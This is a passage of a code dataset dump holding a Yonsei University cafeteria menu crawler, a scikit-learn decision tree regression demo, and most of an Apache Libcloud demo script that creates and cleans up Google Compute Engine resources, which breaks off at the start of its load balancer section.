0:\n meals.__delitem__(0)\n meals = list(filter((\"\").__ne__, meals))\n if (current_rowspan == 2 and current_row == 1) or (current_rowspan == 3 and current_row == 2):\n for td in tr.find_all(\"td\"):\n price = td.font.get_text() if td.font else td.get_text().replace(\"\\n\", \"\").replace(\"\\r\", \"\").replace(\"\\xa0\", \"\").strip()\n colspan = int(td.attrs.get(\"colspan\", 1))\n prices += colspan * [price]\n prices = list(filter((\"\").__ne__, prices))\n while prices.__len__() < meals.__len__():\n meals.pop()\n type_handler = {\"(아침)\": \"BR\", \"(점심)\": \"LU\", \"(저녁)\": \"DN\"}\n type = type_handler.get(current_meal_time, \"\")\n meal_handler(type=type, meals=meals, prices=prices, dates=dates, restaurant_name=current_restaurant)\n meals = []\n prices = []\n current_row += 1\n if current_row == current_rowspan:\n current_row = 0\n\ndef student_crawler():\n page = requests.get(\"https://coop.yonsei.ac.kr:5013/Menu/Student.asp\")\n soup = BeautifulSoup(page.content, \"html.parser\")\n soup.table.tr.extract()\n COLUMN_COUNT = 7\n dates = None\n meals = []\n prices = []\n current_restaurant = \"\"\n trs = soup.find_all(\"tr\")\n isCafeteria = False\n current_rowspan = 2\n current_row = 0\n is_first_row = True\n meal_price_re = re.compile(\"(.*)/(.*)\")\n chinese_meal_type1_re = re.compile(\"(.*)/단품(.*),곱배기(.*)\")\n chinese_meal_type2_re = re.compile(\"(.*)/단품(.*) 곱배기 (.*)\")\n\n for tr in trs:\n if tr.td.attrs.get(\"colspan\") == COLUMN_COUNT.__str__() or 
tr.td.attrs.get(\"colspan\") == (COLUMN_COUNT - 1).__str__():\n tr.extract()\n continue\n if tr.td.font and tr.td.font.attrs.get(\"color\") == \"#CCFF00\":\n current_restaurant = tr.td.font.get_text().replace(\"\\r\", \"\").replace(\"\\n\", \"\").replace(\" \",\"\")\n isCafeteria = not isCafeteria\n dates = [td.font.get_text() for td in tr.find_all(\"td\")[1:COLUMN_COUNT]]\n def get_date(date):\n year = timezone.localtime(timezone.now()).year\n month = re.compile(\"([0-9]{0,2})/\").findall(date)[0].zfill(2)\n day = re.compile(\"/([0-9]{0,2})\").findall(date)[0].zfill(2)\n return \"%s-%s-%s\" % (year, month, day)\n dates = list(map(get_date, dates))\n dates_handler(dates=dates, restaurant_name=current_restaurant)\n continue\n if isCafeteria:\n if current_row == 0:\n meals = [ele.font.get_text() for ele in tr.find_all(\"td\")]\n meals = meals[1:]\n elif current_row == 1:\n prices = [ele.get_text().replace(\"\\r\", \"\").replace(\"\\n\", \"\").replace(\" \",\"\") for ele in tr.find_all(\"td\")]\n prices = prices[1:]\n type = \"BR\" if is_first_row else \"\"\n is_first_row = False\n meal_handler(type=type, meals = meals, prices=prices, dates=dates, restaurant_name=current_restaurant)\n meals = []\n prices = []\n current_row += 1\n if current_row == current_rowspan:\n current_row = 0\n else:\n for td in tr.find_all(\"td\"):\n meal_price_text = td.get_text().replace(\"\\r\", \"\").replace(\"\\n\", \"\").strip()\n meal_price = None\n is_chinese = False\n if chinese_meal_type1_re.search(meal_price_text):\n meal_price = chinese_meal_type1_re.findall(meal_price_text)[0]\n is_chinese = True\n elif chinese_meal_type2_re.search(meal_price_text):\n meal_price = chinese_meal_type2_re.findall(meal_price_text)[0]\n is_chinese = True\n if is_chinese:\n meals.append([\"%s(단품)\" % meal_price[0], \"%s(곱배기)\" % meal_price[0]])\n prices.append([meal_price[1], meal_price[2]])\n elif meal_price_re.search(meal_price_text):\n meal_price = meal_price_re.findall(meal_price_text)[0]\n meals.append(meal_price[0])\n prices.append(meal_price[1])\n if meals and prices:\n meal_handler(type=\"\", meals = meals, prices=prices, dates=dates, restaurant_name=current_restaurant)\n meals = []\n prices = []\n\ndef hankyung_crawler():\n page = requests.get(\"https://coop.yonsei.ac.kr:5013/Menu/Hankyung.asp\")\n soup = BeautifulSoup(page.content, \"html.parser\")\n soup.div.extract()\n COLUMN_COUNT = 7\n trs = soup.find_all(\"tr\")\n dates = None\n current_restaurant = \"한경관(교직원식당)\"\n current_meal_time = \"\"\n current_floor = \"\"\n price_re = re.compile(\"[,0-9]{,}원\")\n meals = [[] for _ in range(COLUMN_COUNT)]\n prices = []\n for tr in trs:\n if tr.td.attrs.get(\"bgcolor\") == \"#99CCCC\":\n current_meal_time = tr.td.font.get_text().replace(\"\\r\", \"\").replace(\"\\n\", \"\").replace(\"\\t\", \"\").replace(\" \", \"\")\n continue\n if int(tr.td.attrs.get(\"colspan\", 1)) > 1:\n tr.extract()\n continue\n if tr.td.attrs.get(\"bgcolor\") == \"#1D8992\":\n dates = [ele.font.get_text() for ele in tr.find_all(\"td\")][1:]\n def get_date(date):\n year = timezone.localtime(timezone.now()).year\n month = re.compile(\"([0-9]{0,2})/\").findall(date)[0].zfill(2)\n day = re.compile(\"/([0-9]{0,2})\").findall(date)[0].zfill(2)\n return \"%s-%s-%s\" % (year, month, day)\n dates = list(map(get_date, dates))\n dates_handler(dates=dates, restaurant_name=current_restaurant)\n continue\n if tr.td.b:\n current_floor == tr.td.b.get_text()\n if price_re.search(tr.find_all(\"td\")[1].font.get_text()):\n prices = [ele.font.get_text() for ele in 
tr.find_all(\"td\")]\n meals = meals[1:]\n type_handler = {\"중식\": \"LU\", \"석식\": \"DN\"}\n meal_handler(type=type_handler[current_meal_time], meals = meals, prices=prices, dates=dates, restaurant_name=current_restaurant)\n meals = [[] for _ in range(COLUMN_COUNT)]\n prices = []\n \n else:\n for index, td in enumerate(tr.find_all(\"td\")):\n if td.font.get_text().replace('\\xa0', ''):\n meals[index].append(td.font.get_text())","repo_name":"beotborry/collegemeals","sub_path":"yonsei/crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":11641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15894317806","text":"import numpy as np\nfrom sklearn import tree\nimport matplotlib.pyplot as plt\n\n\nrng = np.random.RandomState(1)\n\nx = np.sort(5 * rng.rand(200, 1))\ny = np.sin(x)\ny[rng.randint(0, 200, 10)] += rng.rand()\n\nx_test = np.arange(0.0, 5.0, 0.01).reshape(-1, 1)\n\ntree_regr = tree.DecisionTreeRegressor(max_depth=1)\ntree_regr.fit(x, y)\npred_y = tree_regr.predict(x_test)\n\n\nplt.figure()\nplt.scatter(x, y, s=20, edgecolor=\"black\", c=\"darkorange\", label=\"data\")\nplt.plot(x_test, pred_y, color=\"yellowgreen\", label=\"max_depth=5\", linewidth=2)\nplt.xlabel(\"data\")\nplt.ylabel(\"target\")\nplt.title(\"Decision Tree Regression\")\nplt.legend()\nplt.show()","repo_name":"JoshuaSXA/MachineLearning","sub_path":"sklearn/tree_reg.py","file_name":"tree_reg.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23688011702","text":"import sys\nimport time\nimport os.path\nimport argparse\nimport datetime\n\n# Add parent dir of this file's dir to sys.path (OS-agnostically)\nsys.path.append(os.path.normpath(os.path.join(os.path.dirname(__file__), os.path.pardir)))\n\n# isort:skip pragma is needed to make sure those imports are not moved above\n# sys.path manipulation code (https://github.com/PyCQA/isort/issues/468)\nfrom libcloud.dns.base import Zone, Record # isort:skip\nfrom libcloud.dns.types import Provider as Provider_dns # isort:skip\nfrom libcloud.common.google import ResourceNotFoundError # isort:skip\nfrom libcloud.compute.types import Provider # isort:skip\nfrom libcloud.dns.providers import get_driver as get_driver_dns # isort:skip\nfrom libcloud.compute.providers import get_driver # isort:skip\nfrom libcloud.loadbalancer.types import Provider as Provider_lb # isort:skip\nfrom libcloud.loadbalancer.providers import get_driver as get_driver_lb # isort:skip\n\ntry:\n import secrets\nexcept ImportError:\n print(\n '\"demos/secrets.py\" not found.\\n\\n'\n \"Please copy secrets.py-dist to secrets.py and update the GCE* \"\n \"values with appropriate authentication information.\\n\"\n \"Additional information about setting these values can be found \"\n \"in the docstring for:\\n\"\n \"libcloud/common/google.py\\n\"\n )\n sys.exit(1)\n\n\n# pylint: disable=no-name-in-module,import-error\nimport urllib.request as url_req\n\n# Maximum number of 1-CPU nodes to allow to run simultaneously\nMAX_NODES = 5\n\n# String that all resource names created by the demo will start with\n# WARNING: Any resource that has a matching name will be destroyed.\nDEMO_BASE_NAME = \"lct\"\n\n# Datacenter to create resources in\nDATACENTER = \"us-central1-f\"\nBACKUP_DATACENTER = \"us-east1-c\"\n\n# Clean up resources at the end (can be set to false in order to\n# inspect resources at the end of the run). 
","repo_name":"JoshuaSXA/MachineLearning","sub_path":"sklearn/tree_reg.py","file_name":"tree_reg.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23688011702","text":"import sys\nimport time\nimport os.path\nimport argparse\nimport datetime\n\n# Add parent dir of this file's dir to sys.path (OS-agnostically)\nsys.path.append(os.path.normpath(os.path.join(os.path.dirname(__file__), os.path.pardir)))\n\n# isort:skip pragma is needed to make sure those imports are not moved above\n# sys.path manipulation code (https://github.com/PyCQA/isort/issues/468)\nfrom libcloud.dns.base import Zone, Record  # isort:skip\nfrom libcloud.dns.types import Provider as Provider_dns  # isort:skip\nfrom libcloud.common.google import ResourceNotFoundError  # isort:skip\nfrom libcloud.compute.types import Provider  # isort:skip\nfrom libcloud.dns.providers import get_driver as get_driver_dns  # isort:skip\nfrom libcloud.compute.providers import get_driver  # isort:skip\nfrom libcloud.loadbalancer.types import Provider as Provider_lb  # isort:skip\nfrom libcloud.loadbalancer.providers import get_driver as get_driver_lb  # isort:skip\n\ntry:\n    import secrets\nexcept ImportError:\n    print(\n        '\"demos/secrets.py\" not found.\\n\\n'\n        \"Please copy secrets.py-dist to secrets.py and update the GCE* \"\n        \"values with appropriate authentication information.\\n\"\n        \"Additional information about setting these values can be found \"\n        \"in the docstring for:\\n\"\n        \"libcloud/common/google.py\\n\"\n    )\n    sys.exit(1)\n\n\n# pylint: disable=no-name-in-module,import-error\nimport urllib.request as url_req\n\n# Maximum number of 1-CPU nodes to allow to run simultaneously\nMAX_NODES = 5\n\n# String that all resource names created by the demo will start with\n# WARNING: Any resource that has a matching name will be destroyed.\nDEMO_BASE_NAME = \"lct\"\n\n# Datacenter to create resources in\nDATACENTER = \"us-central1-f\"\nBACKUP_DATACENTER = \"us-east1-c\"\n\n# Clean up resources at the end (can be set to false in order to\n# inspect resources at the end of the run). Resources will be cleaned\n# at the beginning regardless.\nCLEANUP = True\n\nargs = getattr(secrets, \"GCE_PARAMS\", ())\nkwargs = getattr(secrets, \"GCE_KEYWORD_PARAMS\", {})\n\n# Add datacenter to kwargs for Python 2.5 compatibility\nkwargs = kwargs.copy()\nkwargs[\"datacenter\"] = DATACENTER\n\n\n# ==== HELPER FUNCTIONS ====\ndef get_gce_driver():\n    driver = get_driver(Provider.GCE)(*args, **kwargs)\n    return driver\n\n\ndef get_gcelb_driver(gce_driver=None):\n    # The GCE Load Balancer driver uses the GCE Compute driver for all of its\n    # API calls. You can either provide the driver directly, or provide the\n    # same authentication information so the LB driver can get its own\n    # Compute driver.\n    if gce_driver:\n        driver = get_driver_lb(Provider_lb.GCE)(gce_driver=gce_driver)\n    else:\n        driver = get_driver_lb(Provider_lb.GCE)(*args, **kwargs)\n    return driver\n\n\ndef get_dns_driver(gce_driver=None):\n    # The Google DNS driver uses the GCE Compute driver for all of its\n    # API calls. You can either provide the driver directly, or provide the\n    # same authentication information so the DNS driver can get its own\n    # Compute driver.\n    if gce_driver:\n        driver = get_driver_dns(Provider_dns.GOOGLE)(gce_driver=gce_driver)\n    else:\n        driver = get_driver_dns(Provider_dns.GOOGLE)(*args, **kwargs)\n    return driver\n\n\ndef create_mig(gce, mig_base_name, zone, template, postfix, num_instances=2):\n    \"\"\"\n    Creates MIG, sets named ports, modifies various text with 'postfix'.\n\n    :param gce: An initialized GCE driver.\n    :type gce: :class:`GCENodeDriver`\n\n    :param zone: Zone to create Managed Instance Group in.\n    :type zone: :class:`GCEZone` or ``str``\n\n    :param template: Instance Template to use in creating MIG.\n    :type template: :class:`GCEInstanceTemplate`\n\n    :param postfix: string to append to mig name, etc. Example: 'east',\n        'central'\n    :type postfix: ``str``\n\n    :param num_instances: number of instances to create in MIG. Default is 2.\n    :type num_instances: ``int``\n\n    :returns: initialized Managed Instance Group.\n    :rtype: :class:`GCEInstanceGroupManager`\n    \"\"\"\n    mig_name = \"{}-{}\".format(mig_base_name, postfix)\n    mig = gce.ex_create_instancegroupmanager(\n        mig_name,\n        zone,\n        template,\n        num_instances,\n        base_instance_name=mig_name,\n        description=\"Demo for %s\" % postfix,\n    )\n    display(' Managed Instance Group [{}] \"{}\" created'.format(postfix.upper(), mig.name))\n    display(\n        \" ... MIG instances created: %s\"\n        % \",\".join([x[\"name\"] for x in mig.list_managed_instances()])\n    )\n\n    # set the named_ports on the Instance Group.\n    named_ports = [{\"name\": \"%s-http\" % DEMO_BASE_NAME, \"port\": 80}]\n    mig.set_named_ports(named_ports=named_ports)\n    display(\" ... 
MIG ports set: %s\" % named_ports)\n\n return mig\n\n\ndef display(title, resource_list=[]):\n \"\"\"\n Display a list of resources.\n\n :param title: String to be printed at the heading of the list.\n :type title: ``str``\n\n :param resource_list: List of resources to display\n :type resource_list: Any ``object`` with a C{name} attribute\n \"\"\"\n print(\"=> %s\" % title)\n for item in resource_list:\n if isinstance(item, Record):\n if item.name.startswith(DEMO_BASE_NAME):\n print(\"=> name={}, type={}\".format(item.name, item.type))\n else:\n print(\" name={}, type={}\".format(item.name, item.type))\n elif isinstance(item, Zone):\n if item.domain.startswith(DEMO_BASE_NAME):\n print(\"=> name={}, dnsname={}\".format(item.id, item.domain))\n else:\n print(\" name={}, dnsname={}\".format(item.id, item.domain))\n elif hasattr(item, \"name\"):\n if item.name.startswith(DEMO_BASE_NAME):\n print(\"=> %s\" % item.name)\n else:\n print(\" %s\" % item.name)\n else:\n if item.startswith(DEMO_BASE_NAME):\n print(\"=> %s\" % item)\n else:\n print(\" %s\" % item)\n\n\ndef cleanup_only():\n start_time = datetime.datetime.now()\n display(\"Clean-up start time: %s\" % str(start_time))\n gce = get_gce_driver()\n # Get project info and print name\n project = gce.ex_get_project()\n display(\"Project: %s\" % project.name)\n\n # == Get Lists of Everything and Display the lists (up to 10) ==\n # These can either just return values for the current datacenter (zone)\n # or for everything.\n all_nodes = gce.list_nodes(ex_zone=\"all\")\n display(\"Nodes:\", all_nodes)\n\n all_addresses = gce.ex_list_addresses(region=\"all\")\n display(\"Addresses:\", all_addresses)\n\n all_volumes = gce.list_volumes(ex_zone=\"all\")\n display(\"Volumes:\", all_volumes)\n\n # This can return everything, but there is a large amount of overlap,\n # so we'll just get the sizes from the current zone.\n sizes = gce.list_sizes()\n display(\"Sizes:\", sizes)\n\n # These are global\n firewalls = gce.ex_list_firewalls()\n display(\"Firewalls:\", firewalls)\n\n networks = gce.ex_list_networks()\n display(\"Networks:\", networks)\n\n images = gce.list_images()\n display(\"Images:\", images)\n\n locations = gce.list_locations()\n display(\"Locations:\", locations)\n\n zones = gce.ex_list_zones()\n display(\"Zones:\", zones)\n\n snapshots = gce.ex_list_snapshots()\n display(\"Snapshots:\", snapshots)\n\n gfrs = gce.ex_list_forwarding_rules(global_rules=True)\n display(\"Global Forwarding Rules\", gfrs)\n targetproxies = gce.ex_list_targethttpproxies()\n display(\"Target HTTP Proxies\", targetproxies)\n urlmaps = gce.ex_list_urlmaps()\n display(\"URLMaps\", urlmaps)\n bes = gce.ex_list_backendservices()\n display(\"Backend Services\", bes)\n migs = gce.ex_list_instancegroupmanagers(zone=\"all\")\n display(\"Instance Group Managers\", migs)\n its = gce.ex_list_instancetemplates()\n display(\"Instance Templates\", its)\n hcs = gce.ex_list_healthchecks()\n display(\"Health Checks\", hcs)\n\n # == Clean up any old demo resources ==\n display('Cleaning up any \"%s\" resources' % DEMO_BASE_NAME)\n clean_up(\n gce,\n DEMO_BASE_NAME,\n None,\n gfrs + targetproxies + urlmaps + bes + hcs + migs + its,\n )\n\n # == Pause to let cleanup occur and repopulate volume and node lists ==\n if len(migs):\n time.sleep(10)\n all_volumes = gce.list_volumes(ex_zone=\"all\")\n all_nodes = gce.list_nodes(ex_zone=\"all\")\n\n clean_up(\n gce,\n DEMO_BASE_NAME,\n all_nodes,\n all_addresses + all_volumes + firewalls + networks + snapshots,\n )\n volumes = 
gce.list_volumes()\n clean_up(gce, DEMO_BASE_NAME, None, volumes)\n end_time = datetime.datetime.now()\n display(\"Total runtime: %s\" % str(end_time - start_time))\n\n\ndef clean_up(gce, base_name, node_list=None, resource_list=None):\n \"\"\"\n Destroy all resources that have a name beginning with 'base_name'.\n\n :param base_name: String with the first part of the name of resources\n to destroy\n :type base_name: ``str``\n\n :keyword node_list: List of nodes to consider for deletion\n :type node_list: ``list`` of :class:`Node`\n\n :keyword resource_list: List of resources to consider for deletion\n :type resource_list: ``list`` of I{Resource Objects}\n \"\"\"\n if node_list is None:\n node_list = []\n if resource_list is None:\n resource_list = []\n # Use ex_destroy_multiple_nodes to destroy nodes\n del_nodes = []\n for node in node_list:\n if node.name.startswith(base_name):\n del_nodes.append(node)\n\n result = gce.ex_destroy_multiple_nodes(del_nodes)\n for i, success in enumerate(result):\n if success:\n display(\" Deleted %s\" % del_nodes[i].name)\n else:\n display(\" Failed to delete %s\" % del_nodes[i].name)\n\n # Destroy everything else with just the destroy method\n for resrc in resource_list:\n if resrc.name.startswith(base_name):\n try:\n resrc.destroy()\n class_name = resrc.__class__.__name__\n display(\" Deleted {} ({})\".format(resrc.name, class_name))\n except ResourceNotFoundError:\n display(\" Not found: {} ({})\".format(resrc.name, resrc.__class__.__name__))\n except Exception:\n class_name = resrc.__class__.__name__\n display(\" Failed to Delete {} ({})\".format(resrc.name, class_name))\n raise\n\n\ndef main_compute():\n start_time = datetime.datetime.now()\n display(\"Compute demo/test start time: %s\" % str(start_time))\n gce = get_gce_driver()\n # Get project info and print name\n project = gce.ex_get_project()\n display(\"Project: %s\" % project.name)\n\n # == Get Lists of Everything and Display the lists (up to 10) ==\n # These can either just return values for the current datacenter (zone)\n # or for everything.\n all_nodes = gce.list_nodes(ex_zone=\"all\")\n display(\"Nodes:\", all_nodes)\n\n all_addresses = gce.ex_list_addresses(region=\"all\")\n display(\"Addresses:\", all_addresses)\n\n all_volumes = gce.list_volumes(ex_zone=\"all\")\n display(\"Volumes:\", all_volumes)\n\n # This can return everything, but there is a large amount of overlap,\n # so we'll just get the sizes from the current zone.\n sizes = gce.list_sizes()\n display(\"Sizes:\", sizes)\n\n # These are global\n firewalls = gce.ex_list_firewalls()\n display(\"Firewalls:\", firewalls)\n\n subnetworks = gce.ex_list_subnetworks()\n display(\"Subnetworks:\", subnetworks)\n\n networks = gce.ex_list_networks()\n display(\"Networks:\", networks)\n\n images = gce.list_images()\n display(\"Images:\", images)\n\n locations = gce.list_locations()\n display(\"Locations:\", locations)\n\n zones = gce.ex_list_zones()\n display(\"Zones:\", zones)\n\n snapshots = gce.ex_list_snapshots()\n display(\"Snapshots:\", snapshots)\n\n # == Clean up any old demo resources ==\n display('Cleaning up any \"%s\" resources' % DEMO_BASE_NAME)\n # Delete subnetworks first, networks last\n clean_up(gce, DEMO_BASE_NAME, None, subnetworks)\n clean_up(\n gce,\n DEMO_BASE_NAME,\n all_nodes,\n all_addresses + all_volumes + firewalls + snapshots + networks,\n )\n\n # == Create a Legacy Network ==\n display(\"Creating Legacy Network:\")\n name = \"%s-legacy-network\" % DEMO_BASE_NAME\n cidr = \"10.10.0.0/16\"\n network_legacy = 
gce.ex_create_network(name, cidr)\n    display(\" Network %s created\" % name)\n\n    # == Delete the Legacy Network ==\n    display(\"Delete Legacy Network:\")\n    network_legacy.destroy()\n    display(\" Network %s deleted\" % name)\n\n    # == Create an auto network ==\n    display(\"Creating Auto Network:\")\n    name = \"%s-auto-network\" % DEMO_BASE_NAME\n    network_auto = gce.ex_create_network(name, cidr=None, mode=\"auto\")\n    display(\" AutoNetwork %s created\" % network_auto.name)\n\n    # == Display subnetworks from the auto network ==\n    subnets = []\n    for sn in network_auto.subnetworks:\n        subnets.append(gce.ex_get_subnetwork(sn))\n    display(\"Display subnetworks:\", subnets)\n\n    # == Delete the auto network ==\n    display(\"Delete Auto Network:\")\n    network_auto.destroy()\n    display(\" AutoNetwork %s deleted\" % name)\n\n    # == Create a custom network ==\n    display(\"Creating Custom Network:\")\n    name = \"%s-custom-network\" % DEMO_BASE_NAME\n    network_custom = gce.ex_create_network(name, cidr=None, mode=\"custom\")\n    display(\" Custom Network %s created\" % network_custom.name)\n\n    # == Create a subnetwork ==\n    display(\"Creating Subnetwork:\")\n    sname = \"%s-subnetwork\" % DEMO_BASE_NAME\n    region = \"us-central1\"\n    cidr = \"192.168.17.0/24\"\n    subnet = gce.ex_create_subnetwork(sname, cidr, network_custom, region)\n    display(\" Subnetwork %s created\" % subnet.name)\n    # Refresh object, now that it has a subnet\n    network_custom = gce.ex_get_network(name)\n\n    # == Display subnetworks from the custom network ==\n    subnets = []\n    for sn in network_custom.subnetworks:\n        subnets.append(gce.ex_get_subnetwork(sn))\n    display(\"Display custom subnetworks:\", subnets)\n\n    # == Launch instance in custom subnetwork ==\n    display(\"Creating Node in custom subnetwork:\")\n    name = \"%s-subnet-node\" % DEMO_BASE_NAME\n    node_1 = gce.create_node(\n        name,\n        \"g1-small\",\n        \"debian-8\",\n        ex_disk_auto_delete=True,\n        ex_network=network_custom,\n        ex_subnetwork=subnet,\n    )\n    display(\" Node %s created\" % name)\n\n    # == Destroy instance in custom subnetwork ==\n    display(\"Destroying Node in custom subnetwork:\")\n    node_1.destroy()\n    display(\" Node %s destroyed\" % name)\n\n    # == Delete a subnetwork ==\n    display(\"Delete Custom Subnetwork:\")\n    subnet.destroy()\n    display(\" Custom Subnetwork %s deleted\" % sname)\n    is_deleted = False\n    while not is_deleted:\n        time.sleep(3)\n        try:\n            subnet = gce.ex_get_subnetwork(sname, region)\n        except ResourceNotFoundError:\n            is_deleted = True\n\n    # == Delete the custom network ==\n    display(\"Delete Custom Network:\")\n    network_custom.destroy()\n    display(\" Custom Network %s deleted\" % name)\n\n    # == Create Node with disk auto-created ==\n    if MAX_NODES > 1:\n        display(\"Creating a node with boot/local-ssd using GCE structure:\")\n        name = \"%s-gstruct\" % DEMO_BASE_NAME\n        img_url = \"projects/debian-cloud/global/images/\"\n        img_url += \"backports-debian-7-wheezy-v20141205\"\n        disk_type_url = \"projects/%s/zones/us-central1-f/\" % project.name\n        disk_type_url += \"diskTypes/local-ssd\"\n        gce_disk_struct = [\n            {\n                \"type\": \"PERSISTENT\",\n                \"deviceName\": \"%s-gstruct\" % DEMO_BASE_NAME,\n                \"initializeParams\": {\n                    \"diskName\": \"%s-gstruct\" % DEMO_BASE_NAME,\n                    \"sourceImage\": img_url,\n                },\n                \"boot\": True,\n                \"autoDelete\": True,\n            },\n            {\n                \"type\": \"SCRATCH\",\n                \"deviceName\": \"%s-gstruct-lssd\" % DEMO_BASE_NAME,\n                \"initializeParams\": {\"diskType\": disk_type_url},\n                \"autoDelete\": True,\n            },\n        ]\n        node_gstruct = gce.create_node(\n            name,\n            \"n1-standard-1\",\n            None,\n            \"us-central1-f\",\n            
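# the image argument is None above: boot and scratch disks are\n            # supplied through the GCE disk struct instead\n            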
ex_disks_gce_struct=gce_disk_struct,\n        )\n        num_disks = len(node_gstruct.extra[\"disks\"])\n        display(\" Node %s created with %d disks\" % (node_gstruct.name, num_disks))\n\n    display(\"Creating Node with auto-created SSD:\")\n    name = \"%s-np-node\" % DEMO_BASE_NAME\n    node_1 = gce.create_node(\n        name,\n        \"n1-standard-1\",\n        \"debian-7\",\n        ex_tags=[\"libcloud\"],\n        ex_disk_type=\"pd-ssd\",\n        ex_disk_auto_delete=False,\n    )\n    display(\" Node %s created\" % name)\n\n    # Stop the node and change to a custom machine type (e.g. size)\n    display(\"Stopping node, setting custom size, starting node:\")\n    name = \"%s-np-node\" % DEMO_BASE_NAME\n    gce.ex_stop_node(node_1)\n    gce.ex_set_machine_type(node_1, \"custom-2-4096\")  # 2 vCPU, 4GB RAM\n    gce.ex_start_node(node_1)\n    node_1 = gce.ex_get_node(name)\n    display(\" {}: state={}, size={}\".format(name, node_1.extra[\"status\"], node_1.size))\n\n    # == Create, and attach a disk ==\n    display(\"Creating a new disk:\")\n    disk_name = \"%s-attach-disk\" % DEMO_BASE_NAME\n    volume = gce.create_volume(10, disk_name)\n    if gce.attach_volume(node_1, volume, ex_auto_delete=True):\n        display(\" Attached {} to {}\".format(volume.name, node_1.name))\n    display(\" Disabled auto-delete for {} on {}\".format(volume.name, node_1.name))\n    gce.ex_set_volume_auto_delete(volume, node_1, auto_delete=False)\n\n    if CLEANUP:\n        # == Detach the disk ==\n        if gce.detach_volume(volume, ex_node=node_1):\n            display(\" Detached {} from {}\".format(volume.name, node_1.name))\n\n    # == Create Snapshot ==\n    display(\"Creating a snapshot from existing disk:\")\n    # Create a disk to snapshot\n    vol_name = \"%s-snap-template\" % DEMO_BASE_NAME\n    image = gce.ex_get_image(\"debian-7\")\n    vol = gce.create_volume(None, vol_name, image=image)\n    display(\"Created disk %s to snapshot:\" % DEMO_BASE_NAME)\n    # Snapshot volume\n    snapshot = vol.snapshot(\"%s-snapshot\" % DEMO_BASE_NAME)\n    display(\" Snapshot %s created\" % snapshot.name)\n\n    # == Create Node with existing disk ==\n    display(\"Creating Node with existing disk:\")\n    name = \"%s-persist-node\" % DEMO_BASE_NAME\n    # Use objects this time instead of names\n    # Get latest Debian 7 image\n    image = gce.ex_get_image(\"debian-7\")\n    # Get Machine Size\n    size = gce.ex_get_size(\"n1-standard-1\")\n    # Create Disk from Snapshot created above\n    volume_name = \"%s-boot-disk\" % DEMO_BASE_NAME\n    volume = gce.create_volume(None, volume_name, snapshot=snapshot)\n    display(\" Created %s from snapshot\" % volume.name)\n    # Create Node with Disk\n    node_2 = gce.create_node(\n        name,\n        size,\n        image,\n        ex_tags=[\"libcloud\"],\n        ex_boot_disk=volume,\n        ex_disk_auto_delete=False,\n    )\n    display(\" Node {} created with attached disk {}\".format(node_2.name, volume.name))\n\n    # == Update Tags for Node ==\n    display(\"Updating Tags for %s:\" % node_2.name)\n    tags = node_2.extra[\"tags\"]\n    tags.append(\"newtag\")\n    if gce.ex_set_node_tags(node_2, tags):\n        display(\" Tags updated for %s\" % node_2.name)\n    check_node = gce.ex_get_node(node_2.name)\n    display(\" New tags: %s\" % check_node.extra[\"tags\"])\n\n    # == Setting Metadata for Node ==\n    display(\"Setting Metadata for %s:\" % node_2.name)\n    if gce.ex_set_node_metadata(node_2, {\"foo\": \"bar\", \"baz\": \"foobarbaz\"}):\n        display(\" Metadata updated for %s\" % node_2.name)\n    check_node = gce.ex_get_node(node_2.name)\n    display(\" New Metadata: %s\" % check_node.extra[\"metadata\"])\n\n    # == Create Multiple nodes at once ==\n    base_name = \"%s-multiple-nodes\" % DEMO_BASE_NAME\n    number = MAX_NODES - 2\n    if number > 0:\n        
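# create the remaining node budget in a single batched API call\n        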
display(\"Creating Multiple Nodes (%s):\" % number)\n multi_nodes = gce.ex_create_multiple_nodes(\n base_name,\n size,\n image,\n number,\n ex_tags=[\"libcloud\"],\n ex_disk_auto_delete=True,\n )\n for node in multi_nodes:\n display(\" Node %s created\" % node.name)\n\n # == Create a Network ==\n display(\"Creating Network:\")\n name = \"%s-network\" % DEMO_BASE_NAME\n cidr = \"10.10.0.0/16\"\n network_1 = gce.ex_create_network(name, cidr)\n display(\" Network %s created\" % network_1.name)\n\n # == Create a Firewall ==\n display(\"Creating a Firewall:\")\n name = \"%s-firewall\" % DEMO_BASE_NAME\n allowed = [{\"IPProtocol\": \"tcp\", \"ports\": [\"3141\"]}]\n firewall_1 = gce.ex_create_firewall(name, allowed, network=network_1, source_tags=[\"libcloud\"])\n display(\" Firewall %s created\" % firewall_1.name)\n\n # == Create a Static Address ==\n display(\"Creating an Address:\")\n name = \"%s-address\" % DEMO_BASE_NAME\n address_1 = gce.ex_create_address(name)\n display(\" Address {} created with IP {}\".format(address_1.name, address_1.address))\n\n # == List Updated Resources in current zone/region ==\n display(\"Updated Resources in current zone/region\")\n nodes = gce.list_nodes()\n display(\"Nodes:\", nodes)\n\n addresses = gce.ex_list_addresses()\n display(\"Addresses:\", addresses)\n\n firewalls = gce.ex_list_firewalls()\n display(\"Firewalls:\", firewalls)\n\n subnetworks = gce.ex_list_subnetworks()\n display(\"Subnetworks:\", subnetworks)\n\n networks = gce.ex_list_networks()\n display(\"Networks:\", networks)\n\n snapshots = gce.ex_list_snapshots()\n display(\"Snapshots:\", snapshots)\n\n if CLEANUP:\n display(\"Cleaning up %s resources created\" % DEMO_BASE_NAME)\n clean_up(gce, DEMO_BASE_NAME, None, subnetworks)\n clean_up(gce, DEMO_BASE_NAME, nodes, addresses + firewalls + snapshots + networks)\n volumes = gce.list_volumes()\n clean_up(gce, DEMO_BASE_NAME, None, volumes)\n end_time = datetime.datetime.now()\n display(\"Total runtime: %s\" % str(end_time - start_time))\n\n\n# ==== LOAD BALANCER CODE STARTS HERE ====\ndef main_load_balancer():\n start_time = datetime.datetime.now()\n display(\"Load-balancer demo/test start time: %s\" % str(start_time))\n gce = get_gce_driver()\n gcelb = get_gcelb_driver(gce)\n\n # Get project info and print name\n project = gce.ex_get_project()\n display(\"Project: %s\" % project.name)\n\n # Existing Balancers\n balancers = gcelb.list_balancers()\n display(\"Load Balancers\", balancers)\n\n # Protocols\n protocols = gcelb.list_protocols()\n display(\"Protocols\", protocols)\n\n # Healthchecks\n healthchecks = gcelb.ex_list_healthchecks()\n display(\"Health Checks\", healthchecks)\n\n # This demo is based on the GCE Load Balancing Quickstart described here:\n 